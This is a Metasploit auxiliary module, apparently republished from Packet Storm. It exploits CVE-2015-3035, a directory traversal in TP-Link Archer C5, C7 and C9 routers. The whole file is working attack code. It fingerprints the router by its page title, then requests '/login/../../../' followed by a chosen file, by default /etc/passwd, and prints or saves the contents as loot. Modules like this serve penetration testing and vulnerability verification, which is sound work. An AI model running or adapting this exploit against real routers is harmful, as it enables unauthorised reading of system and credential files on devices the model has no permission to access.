Share
## https://sploitus.com/exploit?id=PACKETSTORM:180649
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Deprecated  
moved_from 'auxiliary/scanner/http/archer_c7_traversal'  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Archer C7 Directory Traversal Vulnerability',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the PATH_INFO found at /login/  
on TP-Link Archer C5, C7, and C9 routers of varying versions.  
},  
'References' => [  
[ 'BID', '74050 ' ],  
[ 'CVE', '2015-3035' ]  
],  
'Author' => [ 'Nick Cottrell <ncottrellweb[at]gmail.com>', 'Anna Graterol <annagraterol95[at]gmail.com>', 'Mana Mostaani <mana.mostaani[at]gmail.com>' ],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2015-04-08',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => []  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('FILE', [true, 'The file to retrieve', '/etc/passwd']),  
OptBool.new('SAVE', [false, 'Save the HTTP body', false]),  
]  
)  
end  
  
def check  
res = send_request_raw({  
'method' => 'GET',  
'uri' => '/'  
})  
return Exploit::CheckCode::Unknown unless res  
  
device_title = res.get_html_document&.at('//title')&.text  
if device_title =~ /Archer C\d/  
return Exploit::CheckCode::Appears("Target device '#{device_title}'")  
end  
  
Exploit::CheckCode::Safe('Target does not appear to be an Archer Cx router.')  
end  
  
def run  
uri = normalize_uri('/login/../../../', datastore['FILE'])  
print_status("Grabbing data at #{uri}")  
res = send_request_raw({  
'method' => 'GET',  
'uri' => uri.to_s  
})  
  
fail_with(Failure::Unreachable, 'Connection failed') unless res  
  
fail_with(Failure::NotFound, 'The file does not appear to exist') if res.body.to_s.include?('Error 404 requested page cannot be found')  
  
# We don't save the body by default, because there's also other junk in it.  
# But we still have a SAVE option just in case  
print_good("#{datastore['FILE']} retrieved")  
print_line(res.body)  
  
if datastore['SAVE']  
p = store_loot(  
'archer_c7.file',  
'application/octet-stream',  
rhost,  
res.body,  
::File.basename(datastore['FILE'])  
)  
print_good("File saved as: #{p}")  
end  
end  
end